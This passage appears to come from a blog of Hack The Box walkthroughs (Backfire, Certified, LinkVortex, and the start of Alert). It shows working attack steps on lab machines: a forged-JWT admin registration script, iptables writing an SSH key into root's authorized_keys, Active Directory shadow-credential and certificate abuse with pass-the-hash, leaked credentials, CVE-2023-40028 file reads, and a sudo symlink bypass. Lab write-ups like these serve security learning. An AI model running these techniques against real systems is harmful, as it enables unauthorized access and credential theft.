    "jti": str(uuid.uuid4()),
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",
    "iss": issuer,
    "aud": issuer,
    "iat": int(now.timestamp()),
    "exp": int(expiration.timestamp()),
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"
}

token = jwt.encode(payload, secret, algorithm="HS256")
print("Generated JWT:")
print(token)

# Use Admin JWT to create a new user 'sth_pentest' as TeamLead
burp0_url = f"https://{rhost}/Login/Register"
burp0_headers = {
  "Authorization": f"Bearer {token}",
  "Content-Type": "application/json"
}
burp0_json = {
  "password": "sth_pentest",
  "role": "TeamLead",
  "username": "sth_pentest"
}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
print(r.text)

reqs pyjwt and requests

We got

python3 hardhat_jwtpoc.py
/home/kali/htb/pwn/backfire/hardhat_jwtpoc.py:11: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
Generated JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJIYXJkSGF0X0FkbWluIiwianRpIjoiMGUzYWU3MGItNzQwNS00MzcyLWFiYzgtZDRhODQ2NjIzMTc1IiwiaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNS9pZGVudGl0eS9jbGFpbXMvbmFtZWlkZW50aWZpZXIiOiIxIiwiaXNzIjoiaGFyZGhhdGMyLmNvbSIsImF1ZCI6ImhhcmRoYXRjMi5jb20iLCJpYXQiOjE3NDA1ODQyNjMsImV4cCI6MTc0MzAwMzQ2MywiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiQWRtaW5pc3RyYXRvciJ9.gljEjQXcZJMa729WivL-lDbcjKJoReeQA3-PahKXgis

User sth_pentest created

and just like that we get an admin user sth_pentest:sth_pentest

Remote Code Execution (RCE)

After obtaining a user with TeamLead role using the Authentication Bypass vulnerability, an Attacker can interact with implants and C2 host itself to execute operating system commands.

URL: https://localhost:7096/ImplantInteract

Within the Implant Interact -> Terminal interface, the Attacker can issue arbitrary commands that run with user (that ran it) privileges (by default configuration) on the Victim C2 host or implant hosts.

Source

we found one with the name of sergej we added our ssh key to it and connected successfully and got user flag

and he had sudo access to iptables

sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sergej may run the following commands on backfire:
    (root) NOPASSWD: /usr/sbin/iptables
    (root) NOPASSWD: /usr/sbin/iptables-save

We can abuse that to write firewall rules that would have the content of our pub_key a comment then utilize iptables to save that to /root/.ssh/authorized_keys

Source

so we generated a simple id_ed25519 key using

ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519
cat /home/kali/.ssh/id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF1kvL9QgWPXNBVD97Pkhn879uAGekOji0xga6qcQKkb kali@kali

then we exploit iptables!

sergej@backfire:~$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF1kvL9QgWPXNBVD97Pkhn879uAGekOji0xga6qcQKkb kali@kali\n'

sergej@backfire:~$ sudo iptables-save -f /root/.ssh/authorized_keys

And just like that we get root!

ssh root@backfire.htb                     
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
root@backfire:~# cat /root/root.txt
b4920dd54462b690b1ae029XXXXXXXXX

Certified - HTB

Thu, 02 Jan 2025 00:00:00 GMT

Certified (10.10.11.41)

As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

Enumeration

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 20:47 +00
Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.11s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-03 03:47:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-03T03:49:05+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-03T03:49:05+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-03T03:49:05+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-03T03:49:07+00:00; +7h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2025-03-03T03:48:25
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.99 seconds

Exploitation

To verify Judith’s permissions, we used impacket-dacledit, a tool that allows modifying DACL (Discretionary Access Control List) settings. Running the following command revealed that Judith had WriteProperty permissions on the MANAGEMENT group:

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb/judith.mader:judith09'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250302-212034.bak
[*] DACL modified successfully!

Since WriteProperty permission allows a user to modify group membership, we could add Judith to the MANAGEMENT group using bloodyAD:

bloodyAD --host 10.10.11.41 -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
[+] judith.mader added to Management

Abusing Certificate Services: AD CS Attack via ESC1

At this point, we had WriteProperty over MANAGEMENT, which allowed us to add Judith to the group. The next step was to leverage this new privilege to escalate further.

We attempted to enroll for a certificate using pywhisker, which is commonly used to abuse ESC1 (Enrollee-Supplied Subject Name) vulnerabilities in Active Directory Certificate Services (AD CS)

pywhisker -d "certified.htb" -u "judith.mader" -p judith09 --target management_svc --action add

[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 20303044-a950-a5da-306c-22063c41190c
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: jvxImmiB.pfx
[+] PFX exportiert nach: jvxImmiB.pfx
[i] Passwort für PFX: N1m7nC68bBJd4Urg5qGa
[+] Saved PFX (#PKCS12) certificate & key at path: jvxImmiB.pfx
[*] Must be used with password: N1m7nC68bBJd4Urg5qGa
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

This successfully modified the msDS-KeyCredentialLink attribute of the management_svc account, essentially linking a generated certificate to it.

Next, we used PKINITtools to retrieve a Kerberos TGT (Ticket Granting Ticket):

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx 'jvxImmiB.pfx' -pfx-pass 'N1m7nC68bBJd4Urg5qGa' 'mvc.ccache'
2025-03-03 04:28:56,375 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-03-03 04:28:56,410 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-03-03 04:29:18,107 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-03-03 04:29:18,107 minikerberos INFO     4e95c06d3fabde5dce82cc2718d799e08244d4bd0409cf83f094799eea69e29c
INFO:minikerberos:4e95c06d3fabde5dce82cc2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX99eea69e29c
2025-03-03 04:29:18,109 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

With the TGT in hand, we used getnthash.py to dump the NT hash of management_svc:

python3 getnthash.py certified.htb/management_svc -key 4e95c06d3fabde5dce82cc2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX99eea69e29c
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcXXXXXXXXXXXXXXXX5584

We could use evil-winrm to log into the system as management_svc with the recovered NT hash, which got us the first user flag!

evil-winrm -i certified.htb -u management_svc -H a091c1832bcXXXXXXXXXXXXXXXX5584 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\management_svc\Desktop> more user.txt
053f24244e723XXXXXXXXXXXXXX39a97

Privilege Escalation - Shadow Credentials Attack (ESC8)

During further enumeration, we found that the management_svc user had the ability to modify KeyCredentialLink of another account called ca_operator.

This meant we could create a certificate and associate it with ca_operator to gain authentication without credentials with certipy-ad.

certipy-ad shadow auto -u management_svc@certified.htb -hashes a091c1832bcXXXXXXXXXXXXXXXX5584 -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3e29a10d-00f3-da57-cc5f-e81ec1d8684b'
[*] Adding Key Credential with device ID '3e29a10d-00f3-da57-cc5f-e81ec1d8684b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '3e29a10d-00f3-da57-cc5f-e81ec1d8684b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 2b576acbe6XXXXXXXXXXXXXXXXXb8fe

Now that we had ca_operator’s NTLM hash, we attempted to escalate privileges further

certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcXXXXXXXXXXXXXXXX5584 -user ca_operator -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Certificate-Based Authentication

Looking at the available Active Directory Certificate Templates, we found a vulnerable template: CertifiedAuthentication. This template allowed us to request a certificate for an account with higher privileges.

The attacker identifies a vulnerable certificate template, CertifiedAuthentication, which is improperly configured to allow the issuance of certificates for high-privilege accounts such as Administrator.

So let’s requests it using ca_operator account:

certipy-ad req -username ca_operator@certified.htb -hashes 2b576acbe6XXXXXXXXXXXXXXXXXb8fe-ca certified-DC01-CA -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

To make the certificate request look legitimate, we then update the userPrincipalName of the ca_operator account to administrator@certified.htb. This allows the certificate to be linked to the Administrator account, making it easier to impersonate high-level privileges.

certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcXXXXXXXXXXXXXXXX5584 -user ca_operator -upn ca_operator@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

Now we use it to authenticate as the Administrator account. We leverage Certipy again to request a Ticket Granting Ticket (TGT) from the Kerberos authentication system

certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbcXXXXXXXXXXXXXe2d34

Now that we got the Administrator NTLM hash, we could use evil-winrm for a Pass-The-Hash attack and get the root flag!

evil-winrm -i certified.htb -u administrator -H 0d5b49608bbcXXXXXXXXXXXXXe2d34
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ../Desktop/root.txt
d98a9efb8897d788c6XXXXXXXXXXXXXX

LinkVortex - HTB

Wed, 01 Jan 2025 00:00:00 GMT

LinkVortex (10.10.11.47)

Enumeration

rustscan -a 10.10.11.47 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.47:22
Open 10.10.11.47:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.47
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 19:12 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:12
Completed Parallel DNS resolution of 1 host. at 19:12, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:12
Scanning 10.10.11.47 [2 ports]
Discovered open port 22/tcp on 10.10.11.47
Discovered open port 80/tcp on 10.10.11.47
Completed SYN Stealth Scan at 19:12, 0.07s elapsed (2 total ports)
NSE: Script scanning 10.10.11.47.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 2.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Nmap scan report for 10.10.11.47
Host is up, received user-set (0.053s latency).
Scanned at 2025-02-24 19:12:20 +00 for 2s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63
|_http-title: Did not follow redirect to http://linkvortex.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:12
Completed NSE at 19:12, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.21 seconds
           Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

VHosts

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://linkvortex.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================

Found: dev.linkvortex.htb Status: 200 [Size: 2538]

===============================================================
Finished
===============================================================

Directories

gobuster dir -u http://linkvortex.htb -w /usr/share/wordlists/dirb/common.txt -b 301    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://linkvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   301
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/LICENSE              (Status: 200) [Size: 1065]
/robots.txt           (Status: 200) [Size: 121]
/server-status        (Status: 403) [Size: 199]
/sitemap.xml          (Status: 200) [Size: 527]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

gobuster dir -u http://dev.linkvortex.htb -w /usr/share/wordlists/dirb/common.txt -b '301, 404'
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.linkvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   301,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 199]
/.hta                 (Status: 403) [Size: 199]
/.git/HEAD            (Status: 200) [Size: 41]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 2538]
/server-status        (Status: 403) [Size: 199]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Vulns

From the html src we identified Ghost 5.58 as well as from the cfg extracted from the .git in the dev vhost

which has a List of issues and we got a CVE-2023-40028

email: dev@linkvortex.htb — but it can’t be used to login to the ghost portal

admin@linkvortex.htb

Downloading the .git content using wget since my GitTools was for some reasons corruptng the HEAD file and that left me on a rabbit hole for a whole hour

To avoid downloading the auto-generated index.html files, use the -R/--reject option

wget -r -np -R "index.html*" http://dev.linkvortex.htb/.git/

I used then git show to see what’s going on since I couldnt dump any code from the git it self

git show
commit 299cdb4387763f850887275a716153e84793077d (HEAD, tag: v5.58.0)
Author: Ghost CI <41898282+github-actions[bot]@users.noreply.github.com>
Date:   Fri Aug 4 15:02:54 2023 +0000

    v5.58.0

diff --git a/ghost/admin/package.json b/ghost/admin/package.json
index 7810d46..b30d462 100644
--- a/ghost/admin/package.json
+++ b/ghost/admin/package.json
@@ -1,6 +1,6 @@
 {
   "name": "ghost-admin",
-  "version": "5.57.3",
+  "version": "5.58.0",
   "description": "Ember.js admin client for Ghost",
   "author": "Ghost Foundation",
   "homepage": "http://ghost.org",
diff --git a/ghost/core/package.json b/ghost/core/package.json
index 8ef2863..450a52d 100644
--- a/ghost/core/package.json
+++ b/ghost/core/package.json
@@ -1,6 +1,6 @@
 {
   "name": "ghost",
-  "version": "5.57.3",
+  "version": "5.58.0",
   "description": "The professional publishing platform",
   "author": "Ghost Foundation",
   "homepage": "https://ghost.org",

and we found commit 299cdb4387763f850887275a716153e84793077d we can see what’s going on there by doing git restore . then git diff 299cdb4387763f850887275a716153e84793077d

git diff 299cdb4387763f850887275a716153e84793077d
diff --git a/Dockerfile.ghost b/Dockerfile.ghost
new file mode 100644
index 0000000..50864e0
--- /dev/null
+++ b/Dockerfile.ghost
@@ -0,0 +1,16 @@
+FROM ghost:5.58.0
+
+# Copy the config
+COPY config.production.json /var/lib/ghost/config.production.json
+
+# Prevent installing packages
+RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
+
+# Wait for the db to be ready first
+COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
+COPY entry.sh /entry.sh
+RUN chmod +x /var/lib/ghost/wait-for-it.sh
+RUN chmod +x /entry.sh
+
+ENTRYPOINT ["/entry.sh"]
+CMD ["node", "current/index.js"]
diff --git a/ghost/core/test/regression/api/admin/authentication.test.js b/ghost/core/test/regression/api/admin/authentication.test.js
index 2735588..e654b0e 100644
--- a/ghost/core/test/regression/api/admin/authentication.test.js
+++ b/ghost/core/test/regression/api/admin/authentication.test.js
@@ -53,7 +53,7 @@ describe('Authentication API', function () {
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';
 
             const requestMock = nock('https://api.github.com')
                 .get('/repos/tryghost/dawn/zipball')

And just like that we get our hands on a user credentials left there on the src code

using that with admin emails grants us an authenticated session!

admin@linkvortex.htb:OctopiFociPilfer45

CVE POC FROM THE BOX CREATOR, found by luck lol

CVE-2023-40028

Basically this CVE would allow for Arbitrary File Read so we can read system files and look for potential ssh credantials

./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
file>

I also checked a config file that was mentioned earlier in the commit within the dockerfile and found out some SMTP creds

file> /var/lib/ghost/config.production.json
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

STMP is only used for sending emails but we have an interesting port there for the localhost that’ll take a look over next, so using that with ssh granted us access to the server and flag:

bob@linkvortex.htb:fibber-talented-worth

ssh bob@linkvortex.htb
bob@linkvortex.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Feb 24 20:37:46 2025 from 10.10.16.91
bob@linkvortex:~$ cat user.txt
e1c016d873c4abb7344edbXXXXXXXXXX
bob@linkvortex:~$

perfect so by doing sudo -l we find quite an interesting information

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Bob can execute that with sudo and if criteria’s matches it would cat the content of it,

The criterias are the following, the link ext must be .png, the link target meaning the fullpath to the link file shouldnt contain either of etc or root, a bypass for this should be simple, we can just make a symlink of a symlink and if we simple execute the script on the 2nd symlink it should still point to the 1st one and by doing cat over it we can access /root/root.txt

To get a better understanding I did this

──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ cat image.png
random
                                                                                                                                                                                        
┌──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ basename image.png                                                                                           
image.png
                                                                                                                                                                                        
┌──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ readlink image.png
s/etc/root.txt
                                                                                                                                                                                        
┌──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ ln -s image.png image2.png
                                                                                                                                                                                        
┌──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ cat image2.png 
random
                                                                                                                                                                                        
┌──(kali㉿kali)-[~/htb/pwn/linkvortex]
└─$ readlink image2.png
image.png

And by just doing that we got root flag!

bob@linkvortex:~$ ln -s /root/root.txt /home/bob/1.png
bob@linkvortex:~$ ln -s /home/bob/1.png /home/bob/2.png
bob@linkvortex:~$ export CHECK_CONTENT=true
bob@linkvortex:~$ ls
1.png  2.png  user.txt
bob@linkvortex:~$ ln -s /home/bob/1.png /home/bob/2.png
bob@linkvortex:~$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/2.png
Link found [ /home/bob/2.png ] , moving it to quarantine
Content:
2b896c30a0c32ee8b1c325fc0XXXXXXX

Alert - HTB

Fri, 27 Dec 2024 00:00:00 GMT

Alert (10.10.11.44)

Enumeration

rustscan -a 10.10.11.44 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.44:22
Open 10.10.11.44:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.44
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 13:39 +00
NSE: Loaded 126 scripts for scanning.
